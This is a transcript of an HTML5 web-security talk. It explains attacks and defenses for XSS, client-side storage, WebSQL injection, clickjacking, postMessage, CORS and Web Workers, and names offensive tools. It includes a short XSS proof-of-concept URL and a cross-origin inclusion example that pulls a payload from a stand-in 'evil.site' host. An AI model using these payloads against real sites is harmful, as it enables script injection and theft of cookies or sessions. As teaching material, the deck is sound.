Talk about html5 security

Transcript

1. youstar@insight-labs
   

   View Slide

2.  Introduction to HTML5
    HTML5 threat model
    Vulnerabilities & Defense
    Tools
    Reference
   

   View Slide

3.  History
    HTML1.0——1993.6 Not Standard
    HTML 2.0——1995.11 RFC 1866
    HTML 3.2——1996.1.14 W3C Recommended Standard
    HTML 4.0——1997.12.18 W3C Recommended Standard
    HTML 4.01——1999.12.24 W3C Recommended Standard
    XHTML——2000.1.20 W3C Recommended Standard
    HTML5——2008 First Draft Standard
    2012 W3C Candidate Recommendation
   

   View Slide

4.  Features
    The three aspects of HTML5
   ▪ Content HTML
   ▪ New Tags and Attributes
   ▪ Presentation of content CSS
   ▪ Interaction with content JavaScript
   ▪ Add New API Drag LocalStorage WebWorkers etc
   

   View Slide

5.  Features
   

   View Slide

6. View Slide

7. View Slide

8.  XSS abuse with tags and attributes
    Hiding URL Code
    Stealing from the storage
    Injecting and Exploiting WebSQL
    ClickJacking &&CookieJacking
    Cross Origin Request and postMessage
    Client‐side File Includes
    Botnet and widgets
   

   View Slide

9.  In:
    New tags: ,,,,,
    New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
   input
    New media events
    New tag for 2D rendering
    New form controls for date and time
    Geolocation
    New selectors
    Client-side storage including localStorage, sessionStorage, and WebSQL
    Out:
    Presentation elements such a ,
    Presentation attributes including align, border
    ,
   
    Old special effects: ,
   
   

   View Slide

10.  Attack:
     New XSS Vector
     Bypass Black-list Filter
     Defense:
     Add new tags to Black-list
     Change Regex
    

    View Slide

11. View Slide

12.  DOM
     window.history.back();
     window.history.forward();
     window.history.go();
     HTML5
     history.pushState()
    ▪ history.pushState(state object,title,URL);
     history.replaceState()
    ▪ The same with pushState,but modifies the current
    history entry.
    

    View Slide

13. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<
    script>history.pushState({},'',location.href.split("?").
    shift());document.write(1)
    http://127.0.0.1/html5/poc/history/xsspoc.php
    

    View Slide

14. View Slide

15.  Type
     LocalStorage：for long-term storage
     SessionStorage：for the session application(last
    when the browser closed)
     Differences
     Cookies：4k
     LocalStorage/ SessionStorage：depends on
    browser(usually 5MB)
     Support
     Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
    10.50
    

    View Slide

16. View Slide

17.  Function
     (localStorage | sessionStorage).setItem()
     (localStorage | sessionStorage).getItem()
     (localStorage | sessionStorage).deleteItem()
     (localStorage | sessionStorage).clear()
    

    View Slide

18.  Attack
     Get the data from the storage(cookie,passwd,etc)
     Storage your xss shellcode
     Unlimit the path
     Defense
     Don’t store sensitive data in local storage
     Don't use local storage for session identifiers
     Stick with cookies and use the HTTPOnly and
    Secure flags
    

    View Slide

19. View Slide

20.  Database Storage
     The same as the Google Gears
     Operate
     openDatabase("Database Name", "Database Version", "Database
    Description", "Estimated Size");
     transaction("YOUR SQL STATEMENT HERE");
     executeSql();
     Type
     SQLite (support by WebKit)
    

    View Slide

21.  Attack
     Store shellcode
     SQL inject
     Defense
     Strick with the sql operate
     Encode the sql result before display
     Don’t store sensitive data
    

    View Slide

22.  Store shellcode
    

    View Slide

23.  SQL Injection
     Use sqlite_master
    ▪ SELECT name FROM sqlite_master WHERE type='table'
    ▪ SELECT sql FROM sqlite_master WHERE
    name='table_name'
    ▪ SELECT sqlite_version()
     Select with ?
    ▪ executeSql("SELECT name FROM stud WHERE id=" +
    input_id); False
    ▪ executeSql("SELECT name FROM stud WHERE id=?",
    [input_id]); True
    

    View Slide

24.  Drag and drop basics
     Drag Data
     the drag feedback image
     drag effects
     Drag events:
     dragstart
     dragenter
     dragover
     dragleave
     drag
     drop
     dragend
    

    View Slide

25. View Slide

26.  ClickJacking
     XSS + Drag
    

    View Slide

27. View Slide

28.  CookieJacking
     Use many technology to steal user’s local cookies
     Technology
     How to read the local fileiframe+file://
     How to detect the state of cookies Clickjacking
     How to send cookiesSMB
    

    View Slide

29. View Slide

30.  Defense
     Use iframe with sandbox
     If (top !== window) top.location=
    window.location.href;
     if (top!=self) top.location.href=self.location.href
    

    View Slide

31.  postMessage
     Send
    ▪ otherWindow.postMessage(message, targetOrigin);
     Receive
    window.addEventListener("message", receiveMessage, false);
    function receiveMessage(event)
    {
    if (event.origin !== "http://example.org:8080")
    return;
    // ...
    }
    

    View Slide

32. View Slide

33.  Defense
     Check the postMessage origin
     Don’t use innerHTML
    ▪ Element.innerHTML=e.data;//danger
    ▪ Element.textContent=e.data;//safe
     Don’t use Eval to deal with the mesage
    

    View Slide

34.  Cross-Origin Resource Sharing
    ▪ Originally Ajax calls were subject to Same Origin Policy
    ▪ Site A cannot make XMLHttpRequests to Site B
    ▪ HTML5 makes it possible to make these cross domain calls
    ▪ Site ASite B(Response must include a header)
    ▪ Access-Control-Allow-Origin: Site A Must
    ▪ Access-Control-Allow-Credentials: true | false
    ▪ Access-Control-Expose-Headers:
    ▪ etc
    

    View Slide

35. View Slide

36. View Slide

37.  Defense
     Don’t set this: Access-Control-Allow-Origin: *
    ▪ （Flash crossdomain.xml ）
     Prevent DDOS
    ▪ if(origin=="Site A"){header(Access-Control-Allow-
    Origin:Site A)……//process request}
    

    View Slide

38.  Code like this:
    <br/>x = new XMLHttpRequest();<br/>x.open("GET",location.hash.substring(1));<br/>x.onreadystatechange=function(){if(x.readyState==4){<br/>document.getElementById("main").innerHTML=x.responseText;}}<br/>x.send();<br/>
    
    
     POC
     Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
     VContents of ‘payload.php’ will be included as HTML within
     New type of XSS!!
    

    View Slide

39. View Slide

40.  Web Workers
     running scripts in the background independently
     Very simple
    var w = new Worker("some_script.js");
    w.onmessage = function(e) { // do something };
    w.terminate()
     Access
    ▪ XHR,navigator object,application cache,spawn other workers!
     Can’t access
    ▪ DOM,window,document objects
    

    View Slide

41.  Attack
     Botnet
    ▪ Application‐level DDoS attacks
    ▪ Email Spam
    ▪ Distributed password cracking
     Network Scanning
     Guessing User’s Private IP Address
    ▪ Identify the user’s subnet
    ▪ Identify the IP address
    

    View Slide

42.  COR+XSS+Workers=shell of the future
    

    View Slide

43.  HTML5CSdump
     enumeration and extraction techniques described
    before to obtain all the client-side storage relative
    to a certain domain name
     JS-Recon
     Port Scans
     Network Scans
     Detecting private IP address
    

    View Slide

44.  Imposter
     Steal cookies
     Set cookies
     Steal Local Shared Objects
     Steal stored passwords from FireFox
     etc
     Shell of the Future
     Reverse Web Shell handler
     Bypass anti-session hijacking measures
    

    View Slide

45.  Ravan
     JavaScript based Distributed Computing system
     hashing algorithms
    ▪ MD5
    ▪ SHA1
    ▪ SHA256
    ▪ SHA512
    

    View Slide

46.  HTML5 带来的新安全威胁:xisigr
     Attacking with HTML5:lavakumark
     Abusing HTML5:Ming Chow
     HTML5 Web Security:Thomas Röthlisberger
     Abusing HTML 5 Structured Client-side Storage:Alberto Trivero
     Cookiejacking：Rosario Valotta
     http://heideri.ch/jso/#html5
     http://www.wooyun.org/bugs/wooyun-2011-02351
     http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-
    dom-l3-top-10-attacks.html
     http://www.html5test.com
    

    View Slide

47.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.
    html
     http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
     http://code.google.com/intl/zh-CN/apis/gears/api_database.html
     http://michael-coates.blogspot.com/2010/07/html5-local-storage-
    and-xss.html
     http://www.w3.org/TR/access-control/
     http://m-austin.com/blog/?p=19
     https://developer.mozilla.org/en/
     http://www.w3.org/TR/cors/
     http://www.andlabs.org/tools/ravan.html
     http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
    

    View Slide

48.  Contact Me
     email:[email protected]
     Site:
     www.codesec.info
     www.insight-labs.org
    

    View Slide